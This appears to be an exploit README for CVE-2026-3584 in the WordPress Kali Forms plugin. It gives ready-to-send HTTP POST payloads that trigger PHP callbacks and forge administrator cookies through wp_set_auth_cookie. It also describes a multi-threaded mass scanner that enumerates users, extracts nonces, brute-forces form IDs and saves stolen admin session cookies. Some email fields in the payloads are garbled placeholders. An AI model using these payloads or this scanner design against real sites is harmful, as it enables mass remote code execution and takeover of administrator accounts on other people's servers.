
CVE-2026-3584
🔥 Vulnerability Summary
The WordPress Kali Forms plugin versions <= 2.4.9 contain a critical unauthenticated remote code execution (RCE) vulnerability. This flaw allows unauthenticated attackers to execute arbitrary PHP code on the server and gain full administrator privileges through the kaliforms_form_process AJAX endpoint, which is publicly exposed without authorization checks.
The vulnerability resides in the form_process function, which accepts user-controlled parameters (including thisPermalink and entryCounter) and executes arbitrary PHP callbacks, leading to:
phpinfo(), system(), eval(), etc.wp_set_auth_cookie() to obtain administrative sessionsThe vulnerability manifests in the form_process function of the Kali Forms plugin that handles AJAX requests. The vulnerable code is exposed via:
// AJAX endpoint accessible without authentication
add_action('wp_ajax_nopriv_kaliforms_form_process', array($this, 'form_process'));
Exploit Flow:
Unprotected Endpoint: The /wp-admin/admin-ajax.php?action=kaliforms_form_process endpoint is accessible to unauthenticated users via the wp_ajax_nopriv_ hook.
User-Controllable Parameters:
data[thisPermalink] - can contain an arbitrary PHP function namedata[entryCounter] - can contain an arbitrary PHP function namedata[formId] - ID of the form to processUnfiltered Callback Execution: The vulnerable code executes PHP callbacks without validation:
$callback = $_POST['data']['thisPermalink'];
call_user_func($callback); // No validation!
Exploit Chain:
Attacker → POST Request → kaliforms_form_process
↓
thisPermalink=phpinfo → call_user_func('phpinfo') ↓ PHP Code Execution → phpinfo() executed ↓ entryCounter=wp_set_auth_cookie → Admin cookie generated ↓ Full Admin Access
**Vulnerable Request Example:**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[thisPermalink]=phpinfo&
data[email][email protected]
Result: The server executes phpinfo() and returns complete information about the PHP configuration.
For Privilege Escalation:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[entryCounter]=wp_set_auth_cookie&
data[email][email protected]
Result: WordPress executes wp_set_auth_cookie(user_id) where user_id often corresponds to formId, generating valid administrator session cookies.
The mass_scanner.py implements an automated 4-phase pipeline for the complete exploitation of the CVE-2026-3584 vulnerability:
┌─────────────────────────────────────────────────────────────────┐
│ MASS SCANNER PIPELINE │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Phase 1: REST API Reconnaissance │
│ ├─ Enumerate users: /wp-json/wp/v2/users │
│ └─ Enumerate posts: /wp-json/wp/v2/posts │
│ → Identify user_id and post_id for escalation │
│ │
│ Phase 2: Form Discovery │
│ ├─ Crawl site (depth=2) │
│ ├─ Search for patterns: 'KaliFormsObject', 'kaliforms' │
│ ├─ Extract nonce from JavaScript │
│ └─ Extract formId from HTML │
│ → Find all vulnerable Kali Forms forms │
│ │
│ Phase 3: RCE Test │
│ ├─ Send: data[thisPermalink]=phpinfo │
│ ├─ Verify: 'PHP Version' in response │
│ └─ Save: result/target_phpinfo.html │
│ → Confirm remote code execution │
│ │
│ Phase 4: Privilege Escalation │
│ ├─ Send: data[entryCounter]=wp_set_auth_cookie │
│ ├─ Extract: wordpress_logged_in + wordpress_sec cookies │
│ ├─ Verify: access to /wp-admin/ without redirect │
│ └─ Save: result_cookie/target.txt │
│ → Obtain full administrator access │
│ │
└─────────────────────────────────────────────────────────────────┘
1. Automatic URL Normalization
def normalize_url(self, target):
# Automatically adds http:// or https://
# Tries HTTPS first, then falls back on HTTP
# Handles custom ports (e.g. :8080)
2. REST API Enumeration
def enumerate_users_api(self, target):
# GET /wp-json/wp/v2/users
# Extracts all available user_ids
# Used to map formId → user_id
def enumerate_posts_api(self, target):
# GET /wp-json/wp/v2/posts
# Extracts all available post_ids
# Identifies user_id/post_id overlaps
3. Form Discovery (Intelligent Crawling)
def discover_pages(self, target, max_depth=2):
# Recursively crawls the site
# Searches for JavaScript patterns: 'KaliFormsObject'
# Filters out unnecessary URLs (js, css, images)
# Follows only internal links
# Returns list of pages with Kali Forms
4. Form Data Extraction
def extract_form_data(self, page_url):
# Extracts nonce from JavaScript:
# KaliFormsObject = { ajax_nonce: "abc123" }
# Extracts formId from HTML:
# data-id="1" or [kaliform id="1"]
# If nonce found but no formId:
# Brute force IDs 1-10
5. RCE Test
def test_rce(self, target, form_id, nonce):
# POST /wp-admin/admin-ajax.php
# Payload: data[thisPermalink]=phpinfo
# Checks: len(response) > 10000 and 'PHP Version' present
# Saves full HTML for analysis
6. Privilege Escalation Test
def test_privilege_escalation_fast(self, target, nonce, user_ids, post_ids):
# Smart strategy:
# 1. Look for user_id/post_id overlaps
# 2. Test IDs with high success probability first
# 3. Fallback on common IDs: 1,2,3,4,5
# For each candidate formId:
# POST data[entryCounter]=wp_set_auth_cookie
# Extracts cookies: wordpress_logged_in + wordpress_sec
# Checks: GET /wp-admin/ → no redirect
# Verifies: 'dashboard' in response
7. Multi-Threading
# ThreadPoolExecutor for parallel processing
# Thread-safe locks for writing results
# Real-time saving (append mode)
# Global statistics with sync